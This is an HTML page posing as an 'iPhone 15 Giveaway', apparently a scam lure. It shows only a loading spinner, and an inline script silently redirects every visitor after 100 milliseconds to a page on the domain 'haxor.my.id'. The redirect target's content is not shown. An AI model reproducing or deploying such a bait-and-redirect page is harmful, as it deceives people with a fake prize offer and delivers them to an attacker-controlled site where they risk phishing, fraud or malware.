<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>iPhone 15 Giveaway</title>
    <meta http-equiv="Content-type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta property="og:image" content="https://i.ibb.co/WxGbQkB/Screenshot-2023-12-25-035640.png"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"/>
    <meta http-equiv="X-UA-Compatible" content="IE=9">





</head>
<body>
    <div class="loader-wrapper">
        <div class="loader"></div>
    </div>

    <script src="script.js"></script>
<style>
body {
    margin: 0;
    overflow: hidden;
}

.loader-wrapper {
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    background-color: #f8f9fa; /* Set the background color as needed */
}

.loader {
    border: 8px solid #3498db; /* Loader color */
    border-radius: 50%;
    border-top: 8px solid #f8f9fa; /* Background color */
    width: 50px;
    height: 50px;
    animation: spin 1s linear infinite;
}

@keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}
</style>
<script>
document.addEventListener("DOMContentLoaded", function() {
    setTimeout(function() {
        window.location.href = "https://haxor.my.id/open/efefcdc.html"; // Replace with the URL you want to redirect to
    }, 100); // Set the duration in milliseconds (1 second in this case)
});
</script>
</body>
</html>